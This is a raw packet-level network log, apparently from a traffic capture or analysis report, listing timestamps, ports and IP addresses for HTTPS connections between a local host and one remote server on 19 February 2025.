Feb 19, 2025 20:56:34.749634027 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.749658108 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.749671936 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.749695063 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.749778032 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.749847889 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.749897957 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.759787083 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.759886026 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.759958029 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.760071039 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.760126114 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.760173082 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.760293961 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.760373116 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.760520935 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.760644913 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.765271902 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.765315056 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.765428066 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.765459061 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.765577078 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.765680075 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.765774965 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.765847921 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.765896082 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.765930891 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.768227100 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.768246889 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.768270969 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.768336058 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.768385887 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.768678904 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.768712997 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.768796921 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.768843889 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.768930912 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.769052029 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.769129992 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.769172907 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.769253969 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.769277096 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.769319057 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.769720078 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.805151939 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.805191040 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.805301905 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.805377007 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.805412054 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.805509090 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.805567026 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.805836916 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.805898905 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.805922985 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.806134939 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.813088894 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.817166090 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.817190886 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.817228079 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.817262888 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.817302942 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.817346096 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.817346096 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.817384005 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.817399025 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.817421913 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.817472935 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.817639112 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.817656040 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.817679882 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.817733049 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.817743063 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.817760944 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.817764044 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.817806005 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.817811966 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.817845106 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.817863941 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.817893982 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.817898989 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.817935944 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.817939043 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.817955971 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.818018913 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.818046093 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.818146944 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.818166018 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.818191051 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.818207026 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.818259954 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.819587946 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.820485115 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.821548939 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.821567059 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.821589947 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.821609020 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.821626902 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.821677923 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.821703911 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.821751118 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.821779966 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.821832895 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.821841955 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.821877003 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.821924925 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.823867083 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.824651003 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.828985929 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.829005957 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.829032898 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.829082012 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.829132080 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.829157114 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.829224110 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.829248905 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.829303980 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.829330921 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.829355001 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.829375982 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.837647915 CET	49782	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.837690115 CET	443	49782	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.837764978 CET	49782	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.837956905 CET	49782	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.837963104 CET	443	49782	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.861284018 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.861447096 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.861469030 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.861484051 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.861505985 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.861541986 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.861562967 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.861603022 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.861614943 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.861634970 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.861682892 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.861701965 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.861721992 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.861731052 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.861753941 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.861792088 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.861802101 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.861851931 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.861916065 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.862106085 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.862525940 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.863291979 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.869751930 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.869787931 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.869826078 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.869877100 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.869904995 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.869950056 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.870064020 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.870085955 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.870120049 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.870127916 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.870132923 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.870151997 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.870165110 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.870187998 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.870213985 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.870224953 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.870244980 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.870260000 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.870285034 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.870285034 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.870300055 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.870310068 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.870332956 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.870383978 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.870409012 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.870418072 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.870443106 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.870450974 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.870776892 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.870816946 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.870858908 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.870903969 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.870951891 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.871038914 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.871078968 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.871112108 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.871200085 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.871225119 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.871419907 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.871614933 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.871663094 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.871709108 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.871784925 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.871834040 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.871864080 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.871933937 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.872008085 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.872050047 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.872102022 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.872196913 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.872440100 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.872458935 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.872524977 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.872545004 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.873739958 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.873771906 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.873878002 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.873898029 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.873991966 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.874023914 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.874114037 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.874136925 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.874171972 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.874259949 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.874295950 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.874326944 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.874411106 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.874470949 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.874511003 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.874737978 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.874772072 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.874881029 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.874928951 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.874969959 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.875045061 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.878343105 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.878376007 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.878465891 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.878509045 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.878541946 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.878626108 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.878648996 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.878891945 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.885273933 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.885299921 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.885397911 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.885432959 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.913300037 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.913641930 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.913688898 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.913809061 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.913834095 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.913849115 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.913932085 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.914011002 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.914045095 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.914140940 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.914194107 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.914225101 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.914315939 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.914386034 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.914417982 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.914514065 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.914587021 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.914618015 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.914716959 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.914781094 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.914958000 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.915051937 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.915117979 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.915149927 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.915256023 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.915282011 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.915354013 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.915407896 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.915456057 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.915543079 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.915591002 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.915631056 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.915647984 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.915702105 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.915761948 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.915792942 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.915877104 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.915916920 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.916199923 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.916296005 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.954466105 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.954504013 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.954699993 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.954775095 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.954938889 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.954950094 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.955033064 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.955091953 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.955279112 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.955383062 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.955463886 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.955519915 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.955641031 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.955738068 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.955805063 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.955971956 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.956063986 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.956140041 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.956171989 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.956300974 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.956336021 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.956367016 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.956465960 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.956533909 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.956708908 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.956790924 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.956875086 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.956907034 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.957027912 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.957067966 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.957099915 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.957207918 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.957263947 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.957294941 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.957396030 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.957447052 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.957634926 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.957714081 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.957791090 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.957823992 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.957910061 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.957988977 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.958022118 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.958045006 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.958101988 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.958136082 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.958276987 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.958368063 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.958410025 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.958583117 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.958676100 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.958715916 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.958748102 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.958859921 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.958892107 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.958934069 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:34.959013939 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:34.959089994 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.001853943 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.002394915 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.002556086 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:35.002600908 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:35.002676964 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.003052950 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:35.003067970 CET	443	49781	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:35.003118992 CET	49781	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:35.003129959 CET	443	49781	116.202.180.73	192.168.2.4
